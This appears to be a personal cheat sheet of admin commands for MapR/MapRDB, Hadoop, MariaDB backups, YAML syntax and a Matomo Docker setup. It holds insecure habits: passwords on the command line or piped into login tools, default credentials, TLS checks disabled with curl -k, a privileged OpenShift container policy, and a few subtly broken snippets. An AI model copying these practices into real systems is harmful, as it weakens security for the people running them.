add these lines to /etc/apt/sources.list:

deb https://package.mapr.com/releases/v6.1.0/ubuntu binary trusty
deb https://package.mapr.com/releases/MEP/MEP-6.0.0/ubuntu binary trusty

installation

apt-get update
# apt-get install mapr-posix-client-basic
apt-get install mapr-posix-client-platinum

configuration

sudo mkdir /mapr
sudo scp $USERNAME@$EDGE_NODE:/opt/mapr/conf/mapr-clusters.conf /opt/mapr/conf/mapr-clusters.conf
sudo scp $USERNAME@$EDGE_NODE:/opt/mapr/conf/ssl_truststore /opt/mapr/conf/ssl_truststore

login

echo "$PASSWORD" | maprlogin password -user $USERNAME -out /tmp/mapruserticket

Yarn

yarn application -list -appStates ALL
yarn logs -applicationId application_1540813402987_9262 

list of accessible queues yarn queue

# map reduce job
mapred queue -showacls | grep SUBMIT_APPLICATIONS

MapRDB

application connector

preferred way for making connection to MapRDB - OJAI

DBShell commands

Two possible types of MaprDB:

# maprdb create table binary table
maprcli table create -path <path_in_maprfs>

# drill 
DRILL_HOST=https://mapr-web.vantage.zur:30101
MAPR_FS=/vantage/data/label/sessions
curl --request PUT --url ${DRILL_HOST}/api/v2/table/${MAPR_FS} --header 'Authorization: Basic '$BASE64_BASIC_AUTH_TOKEN

# maprdb create json table
maprcli table create -path <path_in_maprfs>  -tabletype json

# configuration for maprdb table
maprcli config save -values {"mfs.db.max.rowsize.kb":<value in KB>}

# maprdb table show regions
maprcli table region list -path <path_in_maprfs>
maprcli table region list -path <path_in_maprfs> -json

# maprdb table split
maprcli table region split -path <path_in_maprfs> -fid <region id like: 5358777.43.26313>
# in case of such message - check your table type binary/json
OJAI APIs are currently not supported with binary tables

OJAI log4j logging

            <Logger name="log4j.logger.com.mapr.ojai.store.impl" level="trace" additivity="false">
                <AppenderRef ref="stdout" />
                <AppenderRef ref="asyncFile" />
            </Logger>
            <Root level="trace">
                <AppenderRef ref="stdout" />
                <AppenderRef ref="asyncFile" />
            </Root>

Show info

maprcli table info -path /vantage/deploy/data-access-video/images -json
# !!! totalrows: Estimated number of rows in a table. Values may not match the actual number of rows. This variance occurs because the counter, for performance reasons, is not updated on each row.
# one of the fastest option - drill request: select count(*) from dfs.`/vantage/deploy/data-access-video/images`

# list of regions for table 
maprcli table region list -path /vantage/deploy/data-access-video/images -json

maprdb copy table backup table

mapr copytable -src {path to source} -dst {path to destination}
# without yarn involvement
mapr copytable -src {path to source} -dst {path to destination} -mapreduce false
# move table can be fulfilled with:
hadoop fs -mv

Remove table Delete table

maprcli table delete -path <path_in_maprfs>

Check access to table maprdb table info

maprcli table cf list -path /vantage/deploy/data-access-video/images -cfname default -json

Granting Access Permissions for User

!!! WARNING, pls, read list of existing users before set new !!!
maprcli table cf edit -path /vantage/deploy/data-access-video/images -cfname default -readperm u:tech_user_name
maprcli table cf edit -path /vantage/deploy/data-access-video/images -cfname default -readperm "u:tech_user_name | u:tech_user_name2"
maprcli table cf edit -path $TABLE_NAME -cfname default -readperm u:tech_user_name
maprcli table cf edit -path $TABLE_NAME -cfname default -writeperm u:tech_user_name
maprcli table edit -path $TABLE_NAME -adminaccessperm u:tech_user_name_admin -indexperm u:tech_user_name

maprdb records

show options

mapr dbshell
jsonoptions

maprdb query maprdb search maprdb find

# output to file stdout 
mapr dbshell 'find /mapr/prod/vantage/orchestration/tables/metadata --fields _id --limit 5 --pretty' > out.txt
mapr dbshell 'find /mapr/prod/vantage/orchestration/tables/metadata --fields _id,sessionId --where {"$eq":{"sessionId":"test-001"}} --limit 1'

# request inside shell
mapr dbshell
## more prefered way of searching: 
find /mapr/prod/vantage/orchestration/tables/metadata --query '{"$select":["mdf4Path.name","mdf4Path.fullPath"],"$limit":2}'
find /mapr/prod/vantage/orchestration/tables/metadata --query {"$select":["fullPath"],"$where":{"$lt":{"startTime":0}}} --pretty

find /mapr/prod/vantage/orchestration/tables/metadata --c {"$eq":{"session_id":"9aaa13577-ad80"}} --pretty

## fix issue with multiple document in output
# sed 's/^}$/},/g' $file_src > $file_dest

## less prefered way of searching: 
# last records, default sort: ASC
find /mapr/prod/vantage/orchestration/tables/metadata --fields _id --orderby loggerStartTime.utcNanos:DESC --limit 5
# amount of records: `maprcli table info -path /mapr/prod/vantage/orchestration/tables/metadata -json | grep totalrows`
find /mapr/prod/vantage/orchestration/tables/metadata --fields mdf4Path.name,mdf4Path.fullPath --limit 2 --offset 2 --where {"$eq":{"session_id":"9aaa13577-ad80"}} --orderby created_time
# array in output and in condition
find /mapr/prod/vantage/orchestration/tables/metadata --fields documentId,object_types[].id --where {"$eq":{"object_types[].id":"44447f6d853dd"}}'
find /mapr/prod/vantage/orchestration/tables/metadata --fields documentId,object_types[].id --where {"$between":{"created_time":[159421119000000000,1595200100000000000]}} --limit 5

!!! important !!!, id only, no data in output but "_id": if you don't see all fields in the output, try to change user ( you don't have enough rights )

complex query

find /tbl --q {"$select":"a.c.e",
            "$where":{
                     "$and":[
                             {"$eq":{"a.b[0].boolean":false}},
                             {"$or":[
                                     {"$ne":{"a.c.d":5}},
                                     {"$gt":{"a.b[1].decimal":1}},
                                     {"$lt":{"a.b[1].decimal":10}}
                                     ]
                              }
                             ]
                      }
               }

query with counting amount of elements in array

find //tables/session --query {"$select":["_id"],"$where":{"$and":[{"$eq":{"vin":"BX77777"}},{"$sizeof":{"labelEvents":{"$ge":1}}}]}}

for data:

 "dag_data" : {
    "name" : "drive_markers",
    "number" : {
      "$numberInt" : -1
    }
  },
//  --limit 10 --pretty --c {"$notexists":"dag_data"}
//  --limit 10 --pretty --c {"$eq":{"dag_data.number":-1}}

example of inline execution

REQUEST="find /mapr/prod/vantage/orchestration/tables/metadata --fields mdf4Path.name,mdf4Path.fullPath --limit 2"
echo $REQUEST | tee script.sql
mapr dbshell --cmdfile script.sql > script.result
rm script.sql

example of execution via mapr web, web mapr, MaprDB read document

 MAPR_USER='user'
 MAPR_PASSWORD='password'
DOCUMENT_ID='d99-4a-ac-0cbd'
TABLE_PATH=/vantage/orchestration/tables/sessions
curl --silent  --insecure  -X GET -u $MAPR_USER:$MAPR_PASSWORD  https://mapr-web.vantage.zur:2002/api/v2/table/$TABLE_PATH/document/$DOCUMENT_ID | jq "." | grep labelEvent

# insert record - POST
# delete record - DELETE
insert --table /vantage/processed/tables/markers --id custom_id_1 --value '{"name": "Martha", "age": 35}'
# should be checked logic for inserting with "_id" inside document
# insert --table /vantage/processed/tables/markers --value '{"_id": "custom_id_1", "name": "Martha", "age": 35}'

FILE_CONTENT=$(cat my-record-in-file.json)
RECORD_ID=$(jq -r ._id my-record-in-file.json)
mapr dbshell "insert --table /vantage/processed/tables/markers --id $RECORD_ID --value '$FILE_CONTENT'"

possible error: You already provided '....' earlier

check your single quotas around json object for --value

delete record in maprdb

delete --table /vantage/processed/tables/markers --id "custom_id_1"

Create an index for the thumbnail MapR JSON DB in order to speed up: (query to find all sessionIds with existing thumbnails)

maprcli table index add -path /vantage/deploy/data-access-video/images -index frameNumber_id -indexedfields frameThumbnail
# maprcli table index add -path <path> -index <name> -indexedfields<fields>
# mapr index information ( check isUpdate )
maprcli table index list -path <path>
maprcli table cfcreate / delete / list

Describe data, describe table

mapr dbshell
desc /full/path/to/maprdb/table

manipulate with MapRDB via DbShell

MapRFS maprfs

you can check your current ticket using fs -ls

hadoop fs -mkdir -p /mapr/dp.stg/vantage/data/store/collected/car-data/MDF4/a889-017d6b9bc95b/
hadoop fs -ls /mapr/dp.stg/vantage/data/store/collected/car-data/MDF4/a889-017d6b9bc95b/
hadoop fs -rm -r /mapr/dp.stg/vantage/data/store/collected/car-data/MDF4/a889-017d6b9bc95b/
WEB_HDFS=https://ubssp000007:14000
PATH_TO_FILE="tmp/1.txt"
# BASE_DIR=/mapr/dc.stg.zurich
vim ${BASE_DIR}/$PATH_TO_FILE

MAPR_USER=$USER_API_USER
MAPR_PASS=$USER_API_PASSWORD
# read file
curl  -X GET "${WEB_HDFS}/webhdfs/v1/${PATH_TO_FILE}?op=open" -k -u ${MAPR_USER}:${MAPR_PASS}

# create folder
PATH_TO_NEW_FOLDER=tmp/example
curl -X PUT "${WEB_HDFS}/webhdfs/v1/${PATH_TO_NEW_FOLDER}?op=mkdirs" -k -u ${MAPR_USER}:${MAPR_PASS}

Mapr Hadoop run command on behalf of another user

TICKET_FILE=prod.maprticket
maprlogin renew -ticketfile $TICKET_FILE

# https://github.com/cherkavi/java-code-example/tree/master/console/java-bash-run
hadoop jar java-bash-run-1.0.jar utility.Main ls -la .

issues

with test execution ( scala, java )

Can not find IP for host: maprdemo.mapr.io

solution

# hard way
rm -rf /opt/mapr
# soft way
vim /opt/mapr/conf/mapr-clusters.conf

common issue

Caused by: javax.security.auth.login.LoginException: Unable to obtain MapR credentials
	at com.mapr.security.maprsasl.MaprSecurityLoginModule.login(MaprSecurityLoginModule.java:228)
echo "passw" | maprlogin password -user my_user_name

kerberos authentication

possible issue

  • javax.security.sasl.SaslException: GSS initiate failed
  • rm: Failed to move to trash: hdfs://eqstaging/user/my_user/equinix-staging-deployment-51: Permission denied: user=dataquality, access=WRITE, inode="/user/my_user/deployment-sensor_msgs":ubsdeployer:ubsdeployer:drwxr-xr-x
  • No Kerberos credential available

solution:

  • login into destination Edge node
  • execute 'kinit'

Docker container with MapR docker image

docker local build

how to build mapr container locally

start locally

# ERROR: Invalid MAPR_TZ timezone ()
IMAGE_ID='maprtech/pacc:6.1.0_6.0.0_ubuntu16'
docker run --env MAPR_TZ="UTC" --env MAPR_CONTAINER_USER="temp_user" --env MAPR_CLDB_HOSTS="build_new_container" -it $IMAGE_ID /bin/sh

Security Context Constraints

FROM maprtech/pacc:6.1.0_6.0.0_ubuntu16

permission for image scc

allowHostDirVolumePlugin: true
allowHostIPC: false
allowHostNetwork: false
allowHostPID: false
allowHostPorts: false
allowPrivilegeEscalation: true
allowPrivilegedContainer: true
allowedCapabilities:
- NET_RAW
- SYS_ADMIN
- NET_ADMIN
- SETGID
- SETUID
- SYS_CHROOT
- CAP_AUDIT_WRITE
apiVersion: security.openshift.io/v1
defaultAddCapabilities: null
fsGroup:
  type: RunAsAny
groups:
- r-d-zur-func_engineer
- r-d-zur-engineer
kind: SecurityContextConstraints
metadata:
  generation: 26
  name: mapr-apps-netraw-scc
priority: 5
readOnlyRootFilesystem: false
requiredDropCapabilities: null
runAsUser:
  type: RunAsAny
seLinuxContext:
  type: MustRunAs
supplementalGroups:
  type: RunAsAny
users:
- system:serviceaccount:custom-user:default
volumes:
- configMap
- downwardAPI
- emptyDir
- flexVolume
- hostPath
- persistentVolumeClaim
- projected
- secret

java application in docker container

/opt/mapr/installer/docker/mapr-setup.sh container
java -Dzookeeper.sasl.client=false -classpath /opt/mapr/lib/hadoop-common-2.7.0-mapr-1808.jar:/opt/mapr/kafka/kafka-1.1.1/libs/*:/usr/src/lib/dq-kafka2storage-service-jar-with-dependencies.jar:/usr/src/classes:/usr/src/lib/maprfs-6.1.0-mapr.jar:/usr/src/lib/maprfs-6.1.0-mapr-tests.jar:/usr/src/lib/maprfs-diagnostic-tools-6.1.0-mapr.jar:/usr/src/lib/maprdb-6.1.0-mapr.jar:/usr/src/lib/maprdb-6.1.0-mapr-tests.jar:/usr/src/lib/maprdb-cdc-6.1.0-mapr.jar:/usr/src/lib/maprdb-cdc-6.1.0-mapr-tests.jar:/usr/src/lib/maprdb-mapreduce-6.1.0-mapr.jar:/usr/src/lib/maprdb-mapreduce-6.1.0-mapr-tests.jar:/usr/src/lib/maprdb-shell-6.1.0-mapr.jar:/usr/src/lib/maprdb-shell-6.1.0-mapr-tests.jar:/usr/src/lib/mapr-hbase-6.1.0-mapr.jar:/usr/src/lib/mapr-hbase-6.1.0-mapr-tests.jar:/usr/src/lib/mapr-ojai-driver-6.1.0-mapr.jar:/usr/src/lib/mapr-ojai-driver-6.1.0-mapr-tests.jar:/usr/src/lib/mapr-streams-6.1.0-mapr.jar:/usr/src/lib/mapr-streams-6.1.0-mapr-tests.jar:/usr/src/lib/mapr-tools-6.1.0-mapr.jar:/usr/src/lib/mapr-tools-6.1.0-mapr-tests.jar:/usr/src/lib/mastgateway-6.1.0-mapr.jar:/usr/src/lib/slf4j-api-1.7.12.jar:/usr/src/lib/slf4j-log4j12-1.7.12.jar:/usr/src/lib/log4j-1.2.17.jar:/usr/src/lib/central-logging-6.1.0-mapr.jar:/usr/src/lib/antlr4-runtime-4.5.jar:/usr/src/lib/commons-logging-1.1.3-api.jar:/usr/src/lib/commons-logging-1.1.3.jar:/usr/src/lib/commons-lang-2.5.jar:/usr/src/lib/commons-configuration-1.8.jar:/usr/src/lib/commons-collections-3.2.2.jar:/usr/src/lib/jackson-core-2.11.1.jar:/usr/src/lib/jackson-databind-2.11.1.jar:/usr/src/lib/jline-2.11.jar:/usr/src/lib/joda-time-2.0.jar:/usr/src/lib/json-1.8.jar:/usr/src/lib/kafka-clients-1.1.1-mapr-1808.jar:/usr/src/lib/ojai-3.0-mapr-1808.jar:/usr/src/lib/ojai-mapreduce-3.0-mapr-1808.jar:/usr/src/lib/ojai-scala-3.0-mapr-1808.jar:/usr/src/lib/protobuf-java-2.5.0.jar:/usr/src/lib/trove4j-3.0.3.jar:/usr/src/lib/zookeeper-3.4.11-mapr-1808.jar:/usr/src/lib/jackson-annotations-2.11.1.jar com.ubs.ad.data.Kafka2Storage

MariaDB cheat sheet

links

execute docker container ( utf8 ):

docker pull mariadb

docker run --name mysql-container --volume /my/local/folder/data:/var/lib/mysql --publish 3306:3306 --env MYSQL_ROOT_PASSWORD=root --detach mariadb --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci

execute docker container, create DB with specific name, execute all scripts in folder:

docker pull mariadb

docker run --name mysql-container --volume /my/local/folder/data:/var/lib/mysql --volume /my/path/to/sql:/docker-entrypoint-initdb.d --publish 3306:3306 --env MYSQL_ROOT_PASSWORD=root --env MYSQL_DATABASE={databasename} --detach mariadb --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci

config file, conf file

cat /etc/mysql/mysql.conf.d/mysqld.cnf

connect to mysql using shell tool:

mysql --user=root --password=root
mysql --user=root --password=root --host=127.0.0.1 --port=3306
docker exec -it mysql-container  /usr/bin/mysql  --user=root --password=root

mycli connect

mycli mysql://user_name:passw@mysql_host:mysql_port/schema
# via ssh 
mycli --ssh-user heritageweb --ssh-host 55.55.55.54 mysql://user_name:passw@mysql_host:mysql_port/schema
#   --ssh-user, --ssh-password

.myclirc settings for vertical output

auto_vertical_output = True

mycli execute script, mycli

mycli mysql://user_name:passw@mysql_host:mysql_port/schema --execute "select * from dual"
mycli mysql://user_name:passw@mysql_host:mysql_port/schema < some-sql.txt
mycli mysql://user_name:passw@mysql_host:mysql_port/schema
help;
source some-sql.txt;

import db export db, archive, backup db, restore db, recovery db

prerequisites

## try just to connect to db
mysql --host=mysql-dev-eu.a.db.ondigitalocean.com --port=3060 --user=admin --password=my_passw --database=masterdb 
## docker mysql client 
docker run -it mariadb mysql --host=mysql-dev-eu.a.db.ondigitalocean.com --port=3060 --user=admin --database=masterdb --password=my_passw
## enable server logging !!!
### server-id = 1
### log_bin = /var/log/mysql/mysql-bin.log
sudo sed -i '/server-id/s/^#//g' /etc/mysql/mysql.conf.d/mysqld.cnf && sudo sed -i '/log_bin/s/^#//g' /etc/mysql/mysql.conf.d/mysqld.cnf

mysql dump mariadb dump

# mysqldump installation
# sudo apt install mysql-client-core-8.0
MY_HOST="mysql-dev-eu.a.db.ondigitalocean.com"
MY_USER="admin"
MY_PASS="my_pass"
MY_PORT="3060"
MY_DB="masterdb"
MY_BACKUP="backup.sql"
### backup ( pay attention to 'database' key )
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS $MY_DB > $MY_BACKUP
# 'Access denied; you need (at least one of) the PROCESS privilege(s) for this operation' when trying to dump tablespaces
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --no-tablespaces  $MY_DB > $MY_BACKUP
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --databases $MY_DB > $MY_BACKUP
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --databases $MY_DB --extended-insert | sed 's$),($),\n($g' > $MY_BACKUP
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --databases $MY_DB --extended-insert=FALSE  > $MY_BACKUP
mysqldump --databases ghost_prod --master-data=2 -u $MY_USER -p --single-transaction --order-by-primary -r $MY_BACKUP

# backup only selected tables 
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --extended-insert=FALSE $MY_DB table_1 table_2 > $MY_BACKUP
# backup only selected table with condition 
mysqldump --host=$MY_HOST --user=$MY_USER --port=$MY_PORT --password=$MY_PASS --extended-insert=FALSE --where="column_1=0" --no-create-info $MY_DB table_1 > $MY_BACKUP
### restore #1
mysql -u $MY_USER -p $MY_DB < $MY_BACKUP
# restore #2 
mysql -u $MY_USER -p 
use DATABASE
source /home/user/backup.sql

dump

  • manual start and stop
    • make the server ReadOnly
    mysql> FLUSH TABLES WITH READ LOCK;
    mysql> SET GLOBAL read_only = ON;
    • make dump
    • back server to Normal Mode
    mysql> SET GLOBAL read_only = OFF;
    mysql> UNLOCK TABLES;    
  • with one command without manual step
    • mysqldump --master-data --single-transaction > backup.sql

dump tools

  • ubuntu utility: automysqlbackup
  • raw solution via cron
    crontab -e
    # And add the following config
    50 23 */2 * * mysqldump -u mysqldump DATABASE | gzip > dump.sql.gz >/dev/null 2>&1
  • raw to s3cmd (amazon, digitalocean...)
  • dump with binary log position
    # innodb
    mysqldump --single-transaction --flush-logs --master-data=2 --all-databases --delete-master-logs > backup.sql
    # not innodb
    mysqldump --lock-tables

cold backup (copy raw files)

If you can shut down the MySQL server, you can make a physical backup that consists of all files used by InnoDB to manage its tables. Use the following procedure:

  • Perform a slow shutdown of the MySQL server and make sure that it stops without errors.
  • Copy all InnoDB data files (ibdata files and .ibd files)
  • Copy all InnoDB log files (ib_logfile files)
  • Copy your my.cnf configuration file

backup issue: during backup strange message appears: "Enter password:" even with password in command line

vim .my.cnf
[mysqldump]
user=mysqluser
password=secret
# !!! without password !!!
mysqldump --host=mysql-dev-eu.a.db.ondigitalocean.com --user=admin --port=3060 masterdb table_1 table_2 > backup.sql

execute sql file with mysqltool

  • inside mysql
    source /path/to/file.sql
  • shell command
    mysql -h hostname -u user database < path/to/test.sql
  • via docker
    docker run -it --volume $(pwd):/work mariadb mysql --host=eu-do-user.ondigitalocean.com --user=admin --port=25060 --database=master_db --password=pass
    # docker exec --volume $(pwd):/work -it mariadb
    source /work/zip-code-us.sql

show databases and switch to one of them:

show databases;
use {databasename};

user <-> role

user role relationship

users

show grants;
SELECT host, user FROM mysql.user where user='www_admin'

grant access

GRANT ALL PRIVILEGES ON `www\_masterdb`.* TO `www_admin`@`%`;

print all tables

show tables;

print all tables and all columns

select table_name, column_name, data_type from information_schema.columns
 where TABLE_NAME like 'some_prefix%'
order by TABLE_NAME, ORDINAL_POSITION

print all columns in table, show table structure

describe table_name;
show columns from table_name;
select * from information_schema.columns where TABLE_NAME='listings_dir' and COLUMN_NAME like '%PRODUCT%';
mycli mysql://user:passw@host:port/schema --execute "select table_name, column_name, data_type  from information_schema.columns where TABLE_NAME like 'hlm%' order by TABLE_NAME, ORDINAL_POSITION;" | awk -F '\t' '{print $1","$2","$3}' > columns

add column

-- pay attention to quotas around names
ALTER TABLE `some_table` ADD `json_source` varchar(32) NOT NULL DEFAULT '';
-- don't use 'ALTER COLUMN'
ALTER TABLE `some_table` MODIFY `json_source` varchar(32) NULL;

rename column

alter table messages rename column sent_time to sent_email_time;

mysql version

SELECT VERSION();

example of spring config

  • MariaDB
    ds.setMaximumPoolSize(20);
    ds.setDriverClassName("org.mariadb.jdbc.Driver");
    ds.setJdbcUrl("jdbc:mariadb://localhost:3306/db");
    ds.addDataSourceProperty("user", "root");
    ds.addDataSourceProperty("password", "myPassword");
    ds.setAutoCommit(false);
    // jdbc.dialect:
    //   org.hibernate.dialect.MariaDBDialect
    //   org.hibernate.dialect.MariaDB53Dialect
  • MySQL
    jdbc.driver: com.mysql.jdbc.Driver
    jdbc.dialect: org.hibernate.dialect.MySQL57InnoDBDialect
    jdbc:mysql://localhost:3306/bpmnui?serverTimezone=Europe/Brussels
    

maven dependency

  • MySQL
    ds.setDriverClassName("com.mysql.jdbc.Driver");
    <dependency>
        <groupId>mysql</groupId>
        <artifactId>mysql-connector-java</artifactId>
        <version>6.0.6</version>
    </dependency>
  • MariaDB
    ds.setDriverClassName("org.mariadb.jdbc.Driver");
    <dependency>
        <groupId>org.mariadb.jdbc</groupId>
        <artifactId>mariadb-java-client</artifactId>
        <version>2.2.4</version>
    </dependency>

create database:

DROP DATABASE IF EXISTS {databasename};
CREATE DATABASE {databasename}
  CHARACTER SET = 'utf8'
  COLLATE = 'utf8_general_ci'; 
-- 'utf8_general_ci' - case insensitive
-- 'utf8_general_cs' - case sensitive

create table, autoincrement

create table IF NOT EXISTS `hlm_auth_ext`(
  `auth_ext_id` bigint NOT NULL AUTO_INCREMENT PRIMARY KEY,
  `uuid` varchar(64) NOT NULL,
)  ENGINE=InnoDB AUTO_INCREMENT=10001 DEFAULT CHARSET=utf8;

create column if not exists

ALTER TABLE test ADD COLUMN IF NOT EXISTS column_a VARCHAR(255);

show ddl, ddl for table, ddl table

SHOW CREATE TABLE yourTableName;

table indexes of table

SHOW INDEX FROM my_table_name;

table constraints of table, show constraints

select COLUMN_NAME, CONSTRAINT_NAME, REFERENCED_COLUMN_NAME, REFERENCED_TABLE_NAME from information_schema.KEY_COLUMN_USAGE where TABLE_NAME = 'my_table_name';

subquery returns more than one row, collect comma delimiter, join columns in one group columns

select 
    u.name_f, 
    u.name_l, 
    (select GROUP_CONCAT(pp.title, '')
    from hlm_practices pp where user_id=100
    )
from hlm_user u 
where u.user_id = 100;

date diff, compare date, datetime substraction

----- return another date with shifting by interval
-- (now() - interval 1 day)
----- return amount of days between two dates
-- datediff(now(), datetime_field_in_db )

value substitution string replace

select (case when unsubscribed>0 then 'true' else 'false' end) from lm_user limit 5;

check data

-- check url
SELECT url FROM licenses WHERE length(url)>0 and url NOT REGEXP '^http*';
-- check encoding
SELECT subject FROM mails WHERE subject <> CONVERT(subject USING ASCII);
-- check email address
SELECT email FROM mails WHERE length(email)>0 and upper(email) NOT REGEXP '^[a-zA-Z0-9+_.-]+@[a-zA-Z0-9.-]+$';

Search

simple search

case search, case sensitive, case insensitive

-- case insensitive search
AND q.summary LIKE '%my_criteria%'

-- case sensitive ( if at least one operand is binary string )
AND q.summary LIKE BINARY '%my_criteria%'

similar search

sounds like

select count(*) from users where soundex(name_first) = soundex('vitali');
select count(*) from listing where soundex(description) like concat('%', soundex('asylum'),'%');

full text fuzzy search

search match

SELECT pages.*,
       MATCH (head, body) AGAINST ('some words') AS relevance,
       MATCH (head) AGAINST ('some words') AS title_relevance
FROM pages
WHERE MATCH (head, body) AGAINST ('some words')
ORDER BY title_relevance DESC, relevance DESC

custom function, UDF

DROP FUNCTION if exists `digits_only`;
DELIMITER $$

CREATE FUNCTION `digits_only`(in_string VARCHAR(100) CHARACTER SET utf8)
RETURNS VARCHAR(100)
NO SQL
BEGIN

    DECLARE ctrNumber VARCHAR(50);
    DECLARE finNumber VARCHAR(50) DEFAULT '';
    DECLARE sChar VARCHAR(1);
    DECLARE inti INTEGER DEFAULT 1;

    -- swallow all exceptions, continue in any exception
    DECLARE CONTINUE HANDLER FOR SQLEXCEPTION
    BEGIN

    END;

    IF LENGTH(in_string) > 0 THEN
        WHILE(inti <= LENGTH(in_string)) DO
            SET sChar = SUBSTRING(in_string, inti, 1);
            SET ctrNumber = FIND_IN_SET(sChar, '0,1,2,3,4,5,6,7,8,9');
            IF ctrNumber > 0 THEN
                SET finNumber = CONCAT(finNumber, sChar);
            END IF;
            SET inti = inti + 1;
        END WHILE;
        IF LENGTH(finNumber) > 0 THEN
            RETURN finNumber;
        ELSE
            RETURN NULL;
        END IF;
    ELSE
        RETURN NULL;
    END IF;
END$$
DELIMITER ;

issues

insert datetime issue

-- `date_start_orig` datetime NOT NULL,
(1292, "Incorrect datetime value: '0000-00-00 00:00:00' for column 'date_start_orig' at row 1")

to cure it:

'1970-01-02 00:00:00'
-- or 
SET SQL_MODE='ALLOW_INVALID_DATES';

Yet Another Markup Language cheat sheet

indentation

2 spaces

data types

  • string
  • number
  • boolean
  • list
  • map
host: ger-43
datacenter:
location: Germany
cab: "13"
cab_unit: 3

# block-style
list_of_strings:
- one
- two
- three
# flow-style
another_list_of_strings: [one,two,three]

# block-style
map_example:
  - element_1: one
  - element_2: two
# flow-style
map_example2: {element_1: one , element_2: two }

more comples example - list of maps

credentials:
  - name: 'user1'
    password: 'pass1'
  - name: 'user2'
    password: 'pass2'

comment

# this is comment in yaml
user_name: cherkavi # comment after the value
user_password: "my#secret#password"

multiline

  • one line string ( removing new line marker )
comments: >
Attention, high I/O
since 2019-10-01.
Fix in progress.
  • each line of text - with new line marker ( new line preserving )
downtime_sch: |
2019-10-05 - kernel upgrade
2019-02-02 - security fix

multi documents

---
name: first document

---
name: second document

# not necessary marker ...
...
---
name: third document

place of metadata, header

# this is metadata storage place
---
name: first document

anchor, reference

& - anchor

    • reference to anchor simple reference
---
host: my_host_01
description: &AUTO_GENERATE standard host without specific roles
---
host: my_host_02
description: *AUTO_GENERATE

reference to map

users:
  - name: a1 &user_a1    # define anchor "user_a1"
    manager:
  - name: a2
    manager: *user_a1    # reference to anchor "user_a1"

example with collection

---
host: my_host_01
roles: &special_roles
  - ssh_server
  - apache_server
---
host: my_host_02
roles: *special_roles

another yaml example, anchor reference

base: &base
    name: Everyone has same name

foo: &foo
    <<: *base
    age: 10

bar: &bar
    <<: *base
    age: 20  

TAG

set data type for value

  • seq
  • map
  • str
  • int
  • float
  • null
  • binary
  • omap ( Ordered map )
  • set ( unordered set )
name: Vitalii
id_1: 475123 !!str
id_2: !!str 475123 

assign external URI to tag ( external reference )

should be defined inside metadata

%TAG ! tag:hostdata:de_muc
---
# reference id is: DE_MUC
location: !DE_MUC Cosimabad   

local tag ( reference inside document )

JSON

JSON Hyper-Schema keyword:

  • "$id"
  • "$ref"
  • "$dynamicRef"

Matomo cheat sheet

Useful links:

Alternatives

  • etracker Analytics
  • Econda (E-Commerce fokussiert )
  • Open Web Analytics
  • Piwik Pro

Domain:

TAG <>---T----Variable
         L----Trigger(s)

Download docker-compose files

wget https://raw.githubusercontent.com/matomo-org/docker/master/.examples/apache/db.env
wget https://raw.githubusercontent.com/matomo-org/docker/master/.examples/apache/docker-compose.yml

start containers

docker-compose up

Containers start/stop

start containers

docker-compose up

stop containers

docker-compose down

remove volumes

docker volume ls
docker volume rm apache_matomo
docker volume rm apache_db

Matomo installation

  • go to installation page http://127.0.0.1:8080/

  • Database Setup:

    Password: matomo

  • Super User

    Super user login: admin Password: adminadmin Password (repeat): adminadmin Email: [email protected]

  • website

    Website name: localhost-matomo Website url: http://127.0.0.1:8080

  • for removing Warning about differences in configuration and real host running:

docker exec -it apache_app_1 /bin/bash
sed --in-place 's/\[General\]/\[General\]\nenable_trusted_host_check=0/g' /var/www/html/config/config.ini.php
  • debug messages during request:
# request to remote resource
x-www-browser http://127.0.0.1:8080/matomo.php?idsite=3&rec=1

# create property block 
sed --in-place 's/\[TagManager\]/\[TagManager\]\n\n\[Tracker\]\ndebug=1/g' /var/www/html/config/config.ini.php

# deactivate element in the block
sed --in-place 's/debug = 1/debug = 0/g' /var/www/html/config/config.ini.php
# activate element in the block
sed --in-place 's/debug = 0/debug = 1/g' /var/www/html/config/config.ini.php

In Chrome will not work due default DNT

http://127.0.0.1:8080/matomo.php?idsite=4&rec=1
# Settings->Privacy->Users opt-out->Support Do Not Track preference-> Disable ( not recommended )

**need to de-activate **

  • additional parameters - show full stack trace
docker exec -it apache_app_1 /bin/bash
# activate
sed --in-place  "s/define('PIWIK_PRINT_ERROR_BACKTRACE', false);/define('PIWIK_PRINT_ERROR_BACKTRACE', true);/g" /var/www/html/index.php

# deactivate
sed --in-place  "s/define('PIWIK_PRINT_ERROR_BACKTRACE', true);/define('PIWIK_PRINT_ERROR_BACKTRACE', false);/g" /var/www/html/index.php
  • simple visit trace:
http://127.0.0.1:8080/matomo.php?idsite=3&rec=1

server: db username: matomo password: matomo database: matomo

// scope: page: matomo_log_link_visit_action
// scope: visit: matomo_log_visit
var _paq = window._paq = window._paq || [];
_paq.push(['setCustomVariable',1,"user-id","13,14,15,16","page"]);

start apache for writing first html page with code

docker rm apache
docker run --name apache -v $(pwd):/app -p 7070:8080 bitnami/apache:latest
select * from matomo_log_visit --  contains one entry per visit (returning visitor)
select * from matomo_log_action --  contains all the type of actions possible on the website (e.g. unique URLs, page titles, download URLs…)
select * from matomo_log_link_visit_action --  contains one entry per action of a visitor (page view, …)
select * from matomo_log_conversion --  contains conversions (actions that match goals) that happen during a visit
select * from matomo_log_conversion_item --  contains e-commerce conversion items

client example ( head only )

    <head>
        <title>matomo-test</title>

        <!-- Matomo -->
        <script type="text/javascript">
            var _paq = window._paq || [];
            /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
            _paq.push(["setDoNotTrack", false]);

          </script>
          <!-- End Matomo Code -->

  
        <!-- Matomo Tag Manager -->
        <script type="text/javascript">
            var _mtm = _mtm || [];
            _mtm.push({'mtm.startTime': (new Date().getTime()), 'event': 'mtm.Start'});
            var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
            g.type='text/javascript'; g.async=true; g.defer=true; g.src='http://localhost:8080/js/container_1uvttUpc.js'; s.parentNode.insertBefore(g,s);
            </script>
